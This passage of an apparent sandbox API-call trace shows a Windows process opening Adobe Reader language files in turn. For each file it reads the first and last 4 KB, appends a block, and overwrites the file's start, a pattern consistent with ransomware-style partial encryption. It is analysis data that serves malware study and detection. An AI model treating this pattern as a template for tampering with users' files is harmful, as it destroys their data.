lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.086] CloseHandle (hObject=0x1cc) returned 1 [0097.086] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.087] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0097.087] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6ec8 [0097.087] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0097.088] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.088] ReleaseMutex (hMutex=0x168) returned 1 [0097.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_CR.txt", lpUsedDefaultChar=0x0) returned 30 [0097.088] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.098] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ec8 [0097.098] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.106] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ec8 [0097.107] WriteFile (in: hFile=0x1cc, lpBuffer=0x28729e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28729e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.108] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0097.108] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.108] CloseHandle (hObject=0x1cc) returned 1 [0097.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ni.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.109] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0097.110] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6ecc [0097.110] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0097.110] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.110] ReleaseMutex (hMutex=0x168) returned 1 [0097.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_NI.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_NI.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_NI.txt", lpUsedDefaultChar=0x0) returned 30 [0097.110] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.123] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ecc [0097.123] ReadFile (in: hFile=0x1cc, lpBuffer=0x2870988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.151] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ecc [0097.151] WriteFile (in: hFile=0x1cc, lpBuffer=0x28729e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28729e8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.152] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0097.152] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] CloseHandle (hObject=0x1cc) returned 1 [0097.152] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.116] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.127] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6ec8 [0098.127] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.128] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.137] ReleaseMutex (hMutex=0x168) returned 1 [0098.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_VE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_VE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_VE.txt", lpUsedDefaultChar=0x0) returned 30 [0098.139] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.196] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ec8 [0098.196] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.204] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5ec8 [0098.204] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.205] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0098.205] WriteFile (in: hFile=0x204, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.205] CloseHandle (hObject=0x204) returned 1 [0098.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.208] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.209] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6f48 [0098.209] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.209] ReleaseMutex (hMutex=0x168) returned 1 [0098.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_FR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_FR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fr_FR.txt", lpUsedDefaultChar=0x0) returned 30 [0098.209] ReadFile (in: hFile=0x204, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.217] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5f48 [0098.217] ReadFile (in: hFile=0x204, lpBuffer=0x2866a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.222] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5f48 [0098.223] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.224] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0098.224] WriteFile (in: hFile=0x204, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.224] CloseHandle (hObject=0x204) returned 1 [0098.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6e88 [0098.225] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.225] ReleaseMutex (hMutex=0x168) returned 1 [0098.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.it.txt", lpUsedDefaultChar=0x0) returned 27 [0098.226] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.227] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e88 [0098.227] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.231] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5e88 [0098.231] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.232] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0098.232] WriteFile (in: hFile=0x204, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.232] CloseHandle (hObject=0x204) returned 1 [0098.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.234] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.234] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x626a [0098.234] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.234] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.234] ReleaseMutex (hMutex=0x168) returned 1 [0098.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ko_KR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ko_KR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ko_KR.txt", lpUsedDefaultChar=0x0) returned 30 [0098.234] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.237] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x526a [0098.237] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.242] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x526a [0098.242] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.243] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0098.243] WriteFile (in: hFile=0x204, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.243] CloseHandle (hObject=0x204) returned 1 [0098.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.244] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.244] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6dd6 [0098.244] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.244] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.244] ReleaseMutex (hMutex=0x168) returned 1 [0098.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_BE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_BE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nl_BE.txt", lpUsedDefaultChar=0x0) returned 30 [0098.245] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.247] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5dd6 [0098.247] ReadFile (in: hFile=0x204, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0098.253] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x5dd6 [0098.254] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0098.255] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0098.255] WriteFile (in: hFile=0x204, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0098.255] CloseHandle (hObject=0x204) returned 1 [0098.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0098.257] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.257] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6f46 [0098.257] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0098.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0098.257] ReleaseMutex (hMutex=0x168) returned 1 [0098.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_PT.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0098.258] WideCharToMultiByte (in: CodePage=0xfde9, 